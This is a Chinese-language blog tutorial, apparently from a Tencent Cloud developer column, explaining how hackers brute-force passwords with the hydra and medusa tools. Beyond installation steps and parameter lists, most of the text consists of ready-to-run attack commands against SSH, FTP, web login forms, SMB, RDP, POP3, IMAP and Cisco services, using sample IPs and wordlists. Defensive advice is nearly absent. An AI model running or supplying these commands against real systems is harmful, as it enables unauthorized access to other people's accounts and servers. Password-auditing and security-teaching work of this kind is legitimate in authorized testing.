专栏首页黑客秘密黑客是如何实施暴力破解的?

黑客是如何实施暴力破解的?

“没有网络安全,就没有国家安全”,网络安全已经成为了国家战略级目标,如果做过开发的工程师也可能遇到过网站或者服务器被暴力破解的情况。下面我们就来看看,黑客是如何实施暴力破解攻击的呢?

先介绍一下kali Linux 下自带的这款工具:

hydra:

一、简介

hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。

官网:http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。

二、安装

如果是Debian和Ubuntu发行版,源里自带hydra,直接用apt-get在线安装:

安装依赖包和hydra

sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra

Redhat/Fedora发行版的下载源码包编译安装,先安装相关依赖包: yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel hydra下载地址:http://www.thc.org/releases/hydra-7.3.tar.gz # tar zxvf hydra-7.0-src.tar.gz # cd hydra-7.0-src # ./configure # make # make install

hydra 参数详解:

-R 根据上一次进度继续破解

-S 使用SSL协议连接

-s 指定端口

-l 指定用户名

-L 指定用户名字典(文件)

-p 指定密码破解

-P 指定密码字典(文件)

-e 空密码探测和指定用户密码探测(ns)

-C 用户名可以用:分割(username:password)可以代替-l username -p password

-o 输出文件

-t 指定多线程数量,默认为16个线程

-vV 显示详细过程

server 目标IP

service 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......)

使用案例:

1、破解ssh: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 2、破解ftp: hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 3、get方式提交,破解web登录: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php 4、post方式提交,破解web登录: hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" (参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示。)

5、破解https: hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 6、破解teamspeak: hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 7、破解cisco: hydra -P pass.txt 10.36.16.18 cisco hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 8、破解smb: hydra -l administrator -P pass.txt 10.36.16.18 smb 9、破解pop3: hydra -l muts -P pass.txt my.pop3.mail pop3 10、破解rdp: hydra ip rdp -l administrator -P pass.txt -V 11、破解http-proxy: hydra -l admin -P pass.txt http-proxy://10.36.16.18 12、破解imap: hydra -L user.txt -p secret 10.36.16.18 imap PLAIN hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

medusa:

使用案例:

1) 使用 medusa 破解 ssh 密码

# medusa -M ssh -h 192.168.157.131 -u root -P newpass.txt

#medusa -M ssh -h 192.168.157.131 -U users.txt -P newpass.txt

3)medusa -M ssh -h 192.168.157.131 -U user.txt -P newpass.txt -O sshlog.log

备注:-O  将结果保存到指定文件里

4)破解某个 IP 地址,并测试空密码以及与用户名一样的密码

medusa -M ssh -h 192.168.157.131 -U user.txt root -P newpass.txt -e ns

写在后面:

今天的黑客小秘密就分享到这里,如果你想知道更多关于黑客的小秘密,可以关注我的微信公众号,回复小秘密,或者留言给我。感谢阅读。

欢迎关注 微信公众号: hao有料

原文链接:https://cloud.tencent.com/developer/article/write

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 如何针对 SSH 服务的暴力破解

    关于 SSH 服务的暴力枚举,应用场景主要包括外围的边界突破以及内网的横向移动,所以可能需要在多种平台上使用这样的工具,本文主要介绍几款工具,包括 python...

    信安之路
  • 总结常见的10种破解密码方法

    为了防止键盘记录工具,产生了使用鼠标和图片录入密码的方式,这时黑客可以通过木马程序将用户屏幕截屏下来然后记录鼠标点击的位置,通过记录鼠标位置对比截屏的图片,从而...

    C4rpeDime
  • 微软:暴力破解面前,增强密码复杂性基本没用

    我们都痛恨密码,然而不幸的是在当下及可以看见的未来里,账户登录等在线认证操作的主要方法还是需要使用密码的。密码认证有时确实比较烦人,尤其是一些网站为了密码安全性...

    FB客服
  • 【黑客解析】黑客是如何实现数据库勒索的 ?

    前言 每一次重要通用漏洞的爆发总是会带来一片腥风血雨,任何微小的漏洞,基于43亿IPv4地址这个大基数,总是可以被放大! 从MongoDB开始到MySQL,黑客...

    云鼎实验室
  • 网络攻击是如何运作的—一份完整的列表 ( 2 )

    作者:PAUL CUCU 译者:java达人 来源:https://heimdalsecurity.com/blog/cyber-attack/(点击阅读原文...

    java达人
  • 业务逻辑漏洞探索之暴力破解

    最近斗哥在整理一些业务逻辑漏洞,突然发现好多问题,所以决心和大家一起探讨探讨,今天先从暴力破解开始。

    漏斗社区
  • 小心!关键任务SAP应用程序受到攻击

    全球有40多万家企业和92%的福布斯全球2000强企业使用SAP的企业应用程序进行供应链管理(SCM)、企业资源规划(ERP)、产品生命周期管理(PLM)和客户...

    FB客服
  • 浅谈简易端口扫描威胁感知系统的设计与实现

    一 前言: 正所谓善守者不知其所攻,善攻者不知其所守。网络攻防本来就是一场看不见硝烟的对抗。 本人设计的这套端口蜜罐检测程序,是在总结了大量的APT攻击方法和思...

    FB客服
  • 企业远程办公都有哪些安全风险?腾讯安全专家为您一一剖析

    新冠肺炎疫情期间,大量企业依托云实现了远程办公、信息发布及各类研发业务的快速上线和迭代。在享受云带来的业务弹性高效交付的同时,企业面临的安全风险也如影随形,云...

    腾讯云安全
  • 无线安全第一篇:如何攻破邻居的wife和防范

    很多人有时候会问我怎么破解wife,关于无线网络这一块我也不是很懂,所以特意去了解了一下,然后结合网上的一些文章和教学,将会发出三篇有关这个方面的推送,这里将会...

    网e渗透安全部
  • 信息安全意识-密码安全

    密码是我们生活中最常见的进行身份验证的一个因素,一般我们在登录系统或者是其他应用程序的时候,最先需要利用用户名和密码来验证我们的身份,这称为单因素身...

    牛油果
  • OpenSSH曝高危漏洞,Linux主机面临暴力破解威胁

    OpenSSH软件被爆出一个简单却高危的漏洞,攻击者可以在短时间内进行数千次的登录尝试。 ? OpenSSH是最流行的Linux系统进行远程控制的软件。一般来说...

    FB客服
  • 3分钟了解主机安全问题

    《碟中谍4》中,位于迪拜塔137层的数据中心,网络防火墙是军用级别口令和硬件网关,破解防护困难。于是阿汤哥只身从130楼爬到137楼,进入数据中心,绕过防护设备...

    腾讯云基础安全
  • 破解密码的手段总结

    黑客最常用的一个攻击方式,就是获取目标口令,有了对方密码口令,就相当于有了你家的入户门钥匙,那么接下来所面临的危险就可想而知了。

    7089bAt@PowerLi
  • 腾讯安全:弱口令密码再遭爆破 新型木马瞄准企业SQL数据库下手

    部分网友在设置密码时会有这样的习惯,在多个平台使用同样的密码,或仅使用数字字母单一字符,用个人姓名生日进行组合等。尽管这样的弱口令密码设置方式便于联想记忆,但也...

    腾讯安全
  • 细数那些在2017年被黑客滥用的系统管理工具和协议

    “用指尖改变世界” ? 系统管理工具和合法协议原本是为了给系统管理员、信息安全专业人员、开发人员和程序员的日常工作提供灵活性和高效性而设计的。然而,当被黑客、网...

    企鹅号小编
  • 产业安全专家谈 | 面对恶意攻击,主机安全如何构建云端防御屏障?

    随着云计算的普及,云主机因强劲的性能、较低的成本成为大量传统企业上云和新兴业务快速扩张过程中的主流选择。

    腾讯安全
  • GAN掉马赛克、变脸、戏弄AI,这场GeekPwn黑客趴还有老司机带路

    GeekPwn虽然是一场黑客趴,但也非常适合普通用户来参与,尤其是在蒋昌建老师这位老司机带路的情况下。10月24日,草榴节……呸!程序员节,来自全国各地还有部分...

    FB客服
  • 多接入边缘计算 – 第2部分:保护MEC的安全挑战

    多接入边缘计算(MEC)是一种网络架构,为网络运营商和服务提供商提供云计算能力以及网络边缘的IT服务环境。

    SDNLAB

扫码关注云+社区

领取腾讯云代金券